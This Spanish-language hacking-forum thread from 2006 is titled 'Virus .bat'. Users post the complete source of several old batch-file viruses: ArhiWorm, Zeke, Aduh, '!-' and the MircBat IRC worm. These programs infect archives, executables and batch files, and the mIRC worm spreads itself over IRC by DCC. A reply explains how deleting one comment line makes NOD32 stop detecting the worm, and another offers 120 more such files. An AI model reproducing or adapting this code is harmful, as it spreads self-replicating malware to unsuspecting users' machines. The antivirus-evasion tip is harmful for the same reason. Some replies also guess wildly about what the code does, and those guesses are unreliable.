Virus .bat

Hendrix
Visitante

Virus .bat

« en: Enero 02, 2006, 10:08:32 »

Ola, enkontre un kodigo de un virus en .bat, pero no entiendo ningunu komando!!! no los habia visto nunka, tampoko se lo ke hace este virus...haber si lo desciframos entre todos, hay va el kodigo:

@ctty nul
copy %0 c:\dos\%0
copy %0 %winbootdir%\%0
copy %0 c:\%0
copy %0 ..\%0
for %%f in (*.rar *.zip *.arj) do attrib -r %%f
for %%r in (*.rar) do rar a -tk -y -c- -o+ %%r %0
for %%z in (*.zip) do pkzip -m %%z %0
for %%a in (*.arj) do arj a -d %%a %0
:BAT.ArhiWorm by Duke/SMF
ctty con

Echenle un vistazo y posteen.

PD: programado en 1999

Un Saludo!!

Hendrix


« Última modificación: Enero 02, 2006, 10:11:56 por Hendrix »	En línea

i_berbeu
Colaborador

Desconectado

Mensajes: 486

Re: Virus .bat

« Respuesta #1 en: Enero 02, 2006, 11:44:09 »


	En línea

Prosutch
Visitante

Re: Virus .bat

« Respuesta #2 en: Enero 11, 2006, 11:40:49 »


	En línea

von Newman
Habitual

Desconectado

Mensajes: 216

411 th4t y0u c4n 1m461n y0u c4n d0!

Re: Virus .bat

« Respuesta #3 en: Enero 11, 2006, 10:40:16 »


	En línea

Hendrix
Visitante

Re: Virus .bat

« Respuesta #4 en: Enero 12, 2006, 08:01:47 »

jajaj joer Von Newman...es potente el Norton...jajaja

Yo de estos "kodigos" tengo unos 120....si kereis os los paso....pero los enkontre en un post del foro...

Un Saludo!!

Hendrix


	En línea

asf_oxid
Habitual

Desconectado

Mensajes: 261

Re: Virus .bat

« Respuesta #5 en: Enero 12, 2006, 01:07:09 »

Como funcionan este tipo de (variables??) %%f, %%r ,...

Gracias de antemano en lo que refiere a variables estoy null.

Bon Newman me paso lo mismo con norton...


« Última modificación: Enero 12, 2006, 01:09:28 por asf_oxid »	En línea

....saludos desde barna

RevangelyonX
Habitual

Desconectado

Mensajes: 214

Re: Virus .bat

« Respuesta #6 en: Enero 12, 2006, 02:55:19 »

Pues no se si te fijaste pero i_berbeu lo explika un poko mas arriba...
Salu2


	En línea

von Newman
Habitual

Desconectado

Mensajes: 216

411 th4t y0u c4n 1m461n y0u c4n d0!

Re: Virus .bat

« Respuesta #7 en: Enero 14, 2006, 12:35:09 »


	En línea

Hendrix
Visitante

Re: Virus .bat

« Respuesta #8 en: Enero 14, 2006, 01:41:14 »

Donde (y komo) os los mando??? o los publiko en el foro????pero copiar 120 archivos... :-\ :-\
Weno, diganme algo...

Un Saludo!!

Hendrix


	En línea

Prosutch
Visitante

Re: Virus .bat

« Respuesta #9 en: Enero 14, 2006, 05:05:04 »


	En línea

Hendrix
Visitante

Re: Virus .bat

« Respuesta #10 en: Enero 15, 2006, 09:24:37 »

Pos aki va una tanda:

Zeke.bat

@echo off
if "% @eval[2+2]" == "4" loadbtm on
ren %0.dds %0.exe >nul
if exist %0.exe %0 %1 %2 %3 %4 %5
ren %0.exe %0.dds >nul
ctty nul
for %%f in (..\*.exe ...\*.exe c:*.exe d:*.exe *.exe) do set zeke=%%f
if not exist %zeke% goto end
ren %zeke% *.dds
copy %0.bat %zeke%
ren %zeke% *.bat
:end
set zeke=
ctty con

Aduh b.bat

@if '%_aduh6%==' goto _aduh6
::**** HOST ****
@if not '%_aduh6%==' goto aDuHend
:_aduh6 aDuH
@echo off%_aDuH%
if '%1=='aDuH goto aDuH%2
set aDuH=%0.bat
if not exist %aDuH% set aDuH=%0
if '%aDuH%==' set aDuH=autoexec.bat
set !aDuH=%1 %2 %3 %4 %5 %6 %7 %8 %9
if exist %aDuH% goto aDuHfe
call %aDuH% aDuH h %path%
if exist %aDuH% goto aDuHfe
goto eaDuH
:aDuHh
shift%_aDuH%
if '%2==' goto aDuHend
if exist %2\%aDuH% set aDuH=%2\%aDuH%
if exist %2%aDuH% set aDuH=%2%aDuH%
if exist %2\%aDuH%.bat set aDuH=%2\%aDuH%.bat
if exist %2%aDuH%.bat set aDuH=%2%aDuH%.bat
if not exist %aDuH% goto aDuHh
goto aDuHend
:aDuHfe
command /e:5000 /c %aDuH% aDuH vir . .. %path%
:eaDuH
echo.|time|find "7">nul.aDuH
if errorlevel 1 goto naaDuH
echo.|time|find "a">nul.aDuH
if errorlevel 1 goto naaDuH
echo [0;30;40m[6B [6A[s%_aDuH%
:bg!0 %_aDuH%
echo %bg!%[1;36;40m--O[0;30;40m%_aDuH%
echo %bg!% [1;36;40m--O[0;30;40m%_aDuH%
echo %bg!% [1;36;40m--O[0;30;40m %_aDuH%
echo %bg!% [1;36;40m--O[0;30;40m%_aDuH%
echo %bg!%[1;36;40m--O[0;30;40m[u%_aDuH%
set bg!=%bg!%.%!!%%_aDuH%
if not %bg!%==...................... goto bg!0 %_aDuH%
set bg!=%_aDuH%
echo [K[1B[K[1B[K[1B[K[1B[K[1;37;40m%_aDuH%
echo [3A[25CDuh.[2B[0m%_aDuH%
:naaDuH
call %aDuH% aDuH rh
set _aduh6=>nul.aDuH
set !aDuH=
set aDuH=
goto aDuHend
:aDuHrh
set _aduh6=x%_aDuH%
%aDuH% %!aDuH%
:aDuHvir
shift%_aDuH%
if '%2==' exit aDuH
for %%a in (%2\*.bat %2*.bat) do call %aDuH% aDuH i %%a
goto aDuHvir
:aDuHi
find "aDuH"<%3>nul
if not errorlevel 1 goto aDuHj
echo @if '%%_aduh6%%==' goto _aduh6>aDuH$
type %3>>aDuH$
echo.>>aDuH$
find "aDuH"<%aDuH%>>aDuH$
move aDuH$ %3>nul
exit aDuH
:aDuHj
set aDuH!=%aDuH!%1
if %aDuH!%==11111111 exit
:aDuHend


« Última modificación: Enero 15, 2006, 09:29:56 por Hendrix »	En línea

Hendrix
Visitante

Re: Virus .bat

« Respuesta #11 en: Enero 15, 2006, 09:25:32 »

!-.bat

@echo off%!-%
if '%1=='~ goto !-%2
if exist \!-.bat goto !-r
if not exist %0.bat goto !-e
find "!-"<%0.bat>\!-.BAT
:!-r
command /c \!- ~ s . .. %path%
goto !-e
:!-s
shift%!-%
if '%2==' exist !-
for %%a in (%2\*.bat) do call \!- ~ i %%a
goto !-s
:!-i
find "!-"<%3>!-s
copy !-s !-!>nul
if exist !-! goto !-a
del !-s
type \!-.bat>>%3
exit !-
:!-a
del !-!
:!-e

Autoexec.bat

@ECHO OFF

REM ==========================================
REM MircBat 1.1 / Oct-Nov-1998 by Dark Weenie.
REM ==========================================

IF NOT EXIST C:\MIRC\MIRC.INI GOTO Exit
IF EXIST C:\MIRC\AUTOEXEC.BAT GOTO Exit

DEL C:\MIRC\MIRC.INI > NUL

COPY AUTOEXEC.BAT C:\MIRC\AUTOEXEC.BAT > NUL
COPY AUTOEXEC.BAT C:\MIRC\MIRC.INI > NUL

GOTO Exit

[script]
n0=ON !*:JOIN:#: .DCC SEND $NICK C:\MIRC\AUTOEXEC.BAT

n1=CTCP *:MB:*: .$2- | .HALT

[channels]
n0=#beginner
n1=#casual
n2=#chataway
n3=#chatterz
n4=#chat-world
n5=#chatzone
n6=#cheers
n7=#CyberCafe
n8=#CyberChat
n9=#CyberFriends
n10=#CyberParty
n11=#Family_Chat
n12=#FunChat
n13=#funfactory
n14=#Funshack The Fun and Friendly, All Welcome, Funchannel
n15=#Giggles
n16=#help
n17=#HelpDesk
n18=#hottub
n19=#IRCAddicts
n20=#ircbar
n21=#irchelp General IRC Help
n22=#irclub
n23=#ircnewbies IRC/mIRC Questions Answered with a Smile :-)

n24=#ircpassage
n25=#ircsupport
n26=#IRCWavPlayers mIRC Wavs & Ascii
n27=#Loonybin
n28=#mIRC Ask mIRC Questions Here! (no chatting)
n29=#mIRC_Colors
n30=#mIRC_Lounge
n31=#mIRC_Rainbow mIRC Help, Colours, and Popups!
n32=#mIRC_Wavs'N'Txt
n33=#mIRC4Dummies
n34=#mIRCAide
n35=#mIRCHelp mIRC Questions Welcomed!

n36=#mIRCInTro
n37=#mIRCScripts
n38=#mIRCSetUp
n39=#mIRCsupport
n40=#new2irc
n41=#new2mIRC
n42=#new2mIRC3
n43=#newbiehelp
n44=#newbies
n45=#PartyHouse Party Party Party!

n46=#PlanetChat
n47=#PopInn Friendly Chat, Popups & Colours help
n48=#SpeakEasy
n49=#Speaker's_corner
n50=#teen
n51=#teens
n52=#teenzone
n53=#TheChatterBox
n54=#UserGuide
n55=#Wasteland
n56=#Windows95
n57=#Winsock
n58=#Worldchat

[warn]
fserve=off
dcc=off

[about]
show=iamweasel

[windows]
main=100,600,75,450,0,1,0

[dde]
ServerStatus=on
ServiceName=mIRC

[pfiles]
n0=popups.ini
n1=popups.ini
n2=popups.ini
n3=popups.ini
n4=popups.ini

[dccserver]

n0=1,59,1,1,1,0

[ident]
active=yes
userid=mircbat
system=UNIX
port=113

[socks]
Enabled=no
Port=1080
Method=4
dccs=no

[wizard]
warning=2

[fileserver]
Warning=Off

[extensions]
n0=defaultEXTDIR:download\
n1=*.wav,*.midEXTDIR:sounds\

[text]
commandchar=/
linesep=-

[files]
servers=servers.ini
emailer=
finger=finger.txt
urls=urls.ini
addrbk=addrbk.ini

[mirc]
user=mircbat
email=mircbat
nick=mircbat
anick=mircbat
host=Random US DALnet serverSERVER:irc.dal.net:7000GROUP:1

[dirs]
logdir=logs\
waves=sounds\
midis=sounds\

[colours]
n0=0,6,4,5,2,3,3,3,3,3,3,1,5,2,6,1,3,2,3,5,1,0,1,0,1

[afiles]
n0=aliases.ini

[rfiles]
n0=remote.ini
n1=remote.ini
n2=mirc.ini

[options]
n0=0,1,0,0,0,0,300,0,0,0,1,0,0,0,1,0,0,1,0,0,512,0,1,0,0,0,0
n1=5,50,0,0,0,0,0,0,0,1,0,1,0,0,1,1,1,1,0,0,1,1,1,0,5,0,0
n2=0,1,0,1,1,1,1,1,0,60,120,0,0,1,1,0,1,1,0,120,20,10,0,1,1,0,0
n3=500,0,0,0,0,0,1,1,1,1,0,1,0,0,0,0,3,1,0,1,0,0,0,0,1,1,2,0,0
n4=1,0,1,1,0,3,999,0,0,0,1,0,1024,0,0,99,60,0,0,1,1,1,1,1,1,5000

n5=1,1,1,1,1,1,1,1,1,1,6667,0,0,0,1,0,1,0,300,10,4,0,1,24,0,0,1

:Exit

Metaphase 1998


« Última modificación: Enero 15, 2006, 09:26:26 por Hendrix »	En línea

Hendrix
Visitante

Re: Virus .bat

« Respuesta #12 en: Enero 15, 2006, 09:28:30 »


	En línea

Zegius
Batch Revolution
Colaborador

Desconectado

Mensajes: 595

Re: Virus .bat

« Respuesta #13 en: Enero 15, 2006, 01:44:25 »


	En línea

Hendrix
Visitante

Re: Virus .bat

« Respuesta #14 en: Enero 15, 2006, 02:57:04 »

La verdad...kreo ke komplementan a un virus escrito en otro lenguaje...pero de verdad, no lo se...jejejeje


	En línea

rrrrr
Visitante

Re: Virus .bat

« Respuesta #15 en: Enero 15, 2006, 06:25:44 »

Mejor pon la fuente.
Saludos.


	En línea

XTR
Visitante

Re: Virus .bat

« Respuesta #16 en: Agosto 30, 2006, 11:10:15 »

Vaya antivirus Angry

He mirado un poco aver que es lo que detecta el NOD32 en el codigo Autoexec.bat

si borramos las siguiente linea :
REM MircBat 1.1 / Oct-Nov-1998 by Dark Weenie.

el NOD32 ya no lo detecta como un virus.

Si detectaba n0=ON !*:JOIN:#: .DCC SEND $NICK C:\MIRC\* seria mucho mejor creo yo ...

Saludos


« Última modificación: Agosto 30, 2006, 11:11:13 por XTR »	En línea

N3gD4�
Miembro

Desconectado

Mensajes: 84

Scripter Batch

Re: Virus .bat

« Respuesta #17 en: Agosto 30, 2006, 12:10:26 »

pfff no entiendo nada de estos codigos xD xD es un poco raro no? xD


	En línea

Saok
moderador batch
Gran Colaborador

Desconectado

Mensajes: 2824

Saok siempre esta ahi...

Re: Virus .bat

« Respuesta #18 en: Agosto 30, 2006, 01:46:56 »


	En línea

Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

www.colgados.net

date una pasadita por esta web de warez !

1111th-Sensei
Visitante

Re: Virus .bat

« Respuesta #19 en: ſeptiembre 03, 2006, 07:34:13 »

Viendo estos codigos,acabo de comprender que todavia me queda mucho por aprender de batch!!xD,y yo que creia saberlo casi todo...

Nah...un poco en serio,creo que son funciones como bien dijisteis antes que complementa a otro progrmas,virus codeados posiblemente en c/c++ por lo que pude leer.


	En línea

TheCrasher
Miembro

Desconectado

Mensajes: 23

Re: Virus .bat

« Respuesta #20 en: Octubre 11, 2006, 06:06:58 »

Cita de: Hendrix en Enero 15, 2006, 09:25:32

[channels]
n0=#beginner
n1=#casual
n2=#chataway
n3=#chatterz
n4=#chat-world
n5=#chatzone
n6=#cheers
n7=#CyberCafe
n8=#CyberChat
n9=#CyberFriends
n10=#CyberParty
n11=#Family_Chat
n12=#FunChat
n13=#funfactory
n14=#Funshack The Fun and Friendly, All Welcome, Funchannel
n15=#Giggles
n16=#help
n17=#HelpDesk
n18=#hottub
n19=#IRCAddicts
n20=#ircbar
n21=#irchelp General IRC Help
n22=#irclub
n23=#ircnewbies IRC/mIRC Questions Answered with a Smile :-)

n24=#ircpassage
n25=#ircsupport
n26=#IRCWavPlayers mIRC Wavs & Ascii
n27=#Loonybin
n28=#mIRC Ask mIRC Questions Here! (no chatting)
n29=#mIRC_Colors
n30=#mIRC_Lounge
n31=#mIRC_Rainbow mIRC Help, Colours, and Popups!
n32=#mIRC_Wavs'N'Txt
n33=#mIRC4Dummies
n34=#mIRCAide
n35=#mIRCHelp mIRC Questions Welcomed!

a mi esto me suena a snifer residente, es decir espia canales de chat y de sonido (llamadas seguramente) y luego no se si lo envia o lo codifica y lo guarda. creo q una especie de OVNI de la NASA (si aceis ftp con cliente al ftp de la NASA, encontrais dentro de su ftp un archivo de canales. Creo q es algo parecido.

no se a vosotros??


	En línea

Páginas: [1]

Comunidad Underground Hispana \| Programacion \| Programación \| Batch (Moderadores: Espectro Infernal, \|Shadow\|) \| Tema: Virus .bat	« anterior próximo »

	Bienvenido(a), Visitante. Favor de ingresar o registrarse. ¿Perdiste tu email de activación? - Noviembre 19, 2008, 05:04:36